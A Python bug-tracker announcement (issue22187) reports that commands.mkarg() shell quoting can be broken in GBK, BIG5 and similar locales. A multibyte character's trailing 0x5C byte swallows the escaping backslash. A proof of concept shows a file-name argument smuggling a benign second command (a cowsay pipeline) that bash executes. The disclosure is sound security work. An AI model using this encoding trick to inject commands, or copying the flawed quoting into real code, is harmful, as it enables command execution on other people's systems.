[New-bugs-announce] [issue22187] commands.mkarg() buggy in East Asian locales

Jakub Wilk report at bugs.python.org
Tue Aug 12 20:13:05 CEST 2014


New submission from Jakub Wilk:

This is how shell quoting in commands.mkarg() is implemented:

def mkarg(x):
    if '\'' not in x:
        return ' \'' + x + '\''
    s = ' "'
    for c in x:
        if c in '\\$"`':
            s = s + '\\'
        s = s + c
    s = s + '"'
    return s

This is unfortunately not compatible with the way bash splits arguments in some locales.
The problem is that in a few East Asian encodings (at least BIG5, BIG5-HKSCS, GB18030, GBK), the 0x5C byte (backslash in ASCII) could be the second byte of a two-byte character; and bash apparently decodes the strings before splitting.

PoC:

$ sh --version | head -n1
GNU bash, version 4.3.22(1)-release (i486-pc-linux-gnu)

$ LC_ALL=C python test-mkargs.py
crw-rw-rw- 1 root root 1, 3 Aug 12 16:00 /dev/null
ls: cannot access " ; python -c 'import this' | grep . | shuf | head -n1 | cowsay -y ; ": No such file or directory

$ LC_ALL=zh_CN.GBK python test-mkargs.py
crw-rw-rw- 1 root root 1, 3 8月  12 16:00 /dev/null
ls: 无法访问乗: No such file or directory
 ________________________________
< Simple is better than complex. >
 --------------------------------
        \   ^__^
         \  (..)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
sh: 乗: 未找到命令

----------
components: Library (Lib)
files: test-mkargs.py
messages: 225235
nosy: jwilk
priority: normal
severity: normal
status: open
title: commands.mkarg() buggy in East Asian locales
type: security
versions: Python 2.7
Added file: http://bugs.python.org/file36359/test-mkargs.py

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue22187>
_______________________________________


More information about the New-bugs-announce mailing list